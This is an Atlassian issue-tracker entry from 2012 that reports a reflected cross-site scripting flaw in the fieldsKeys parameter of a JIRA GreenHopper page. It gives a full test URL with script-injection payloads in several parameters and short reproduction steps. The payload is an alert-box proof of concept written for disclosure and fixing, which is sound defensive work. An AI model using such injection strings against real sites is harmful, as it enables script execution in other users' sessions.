XSS (reflected) in fieldsKeys parameter of GHCreateNewIssue.jspa

2012-08-03T03:24:43
ID ATLASSIAN:JSW-5575
Type atlassian
Reporter dblack
Modified 2017-02-20T00:44:58

Description

Targets: https://test01.jira-dev.com/secure/GHCreateNewIssue.jspa?key=&issueType=7&fieldsKeys=priority,customfield_10006,summary,fixVersions,components,customfield_10005,assignee,customfield_10004,reporter,customfield_100039fd29<script>alert('XSS')</script>15d31825f8e9d6606&fieldsValues=1@%@ @%@XSS"><script>alert('XSS')</script>@%@-1@%@-1@%@1000@%@0@%@100@%@isecpartners@%@iSEC"><script>alert('XSS')</script>&forcedFieldsKeys=&forcedFieldsValues=&createNext=false&projectId=&decorator=none&selectedProjectId=10000&pageType=ChartBoard&subType=ArchiveChartBoard&type=ACB&selectedBoardId=-1&colPage=1 Reproduction: After login open target URL in browser. Apply attack value "><script>alert('XSS')</script> in the fieldsKeys parameter.